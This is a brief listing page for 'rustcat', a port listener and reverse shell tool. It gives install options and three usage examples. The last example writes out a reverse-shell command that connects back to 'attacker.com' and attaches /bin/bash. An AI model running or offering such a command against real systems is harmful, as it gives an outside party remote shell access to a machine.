rustcat

Modern port listener and reverse shell tool for networking tasks

brewmacoslinux
Try with needOr install directly
Source

About

Modern Port listener and Reverse shell

Commands

rustcat

Examples

Listen on port 4444 for incoming connections$ rustcat -l -p 4444
Connect to a remote host on port 4444$ rustcat -c 192.168.1.100 -p 4444
Create a reverse shell by connecting back to attacker machine$ rustcat -c attacker.com -p 4444 -e /bin/bash